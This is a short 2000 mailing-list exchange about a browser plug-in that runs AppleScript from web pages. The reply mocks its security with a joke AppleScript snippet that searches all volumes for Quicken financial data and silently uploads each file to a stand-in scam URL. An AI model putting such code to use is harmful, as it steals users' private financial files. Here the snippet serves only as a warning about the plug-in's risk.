[thelist] A Tip for all the help I hav egotten

James Spahr james at designframe.com
Fri Jul 7 17:22:19 CDT 2000


on 7/7/00 5:48 PM, Greg Strange at gstrange at e-tsi.com wrote:

> There is now a browser from Royal Software (www.royalsoftware.com) called
> Script Demon that allows you to run embedded Applescript code in the
> browser.  From their website,
> ScriptDemon is a browser plug-in that, for the first time, allows you to
> deliver and run AppleScripts from Web pages. Take advantage of the new speed
> of the latest version of AppleScript.

heh heh - yea that sounds *really* secure.

tell application "Sherlock"
    set jackpot to find "Quicken Data" on all volumes
end

repeat with goldenNugget in jackpot
    upload goldenNugget to "http://theBankOfMe.com/scam.cgi" progress false
end repeat

I think I'll pass. :)

James.






More information about the thelist mailing list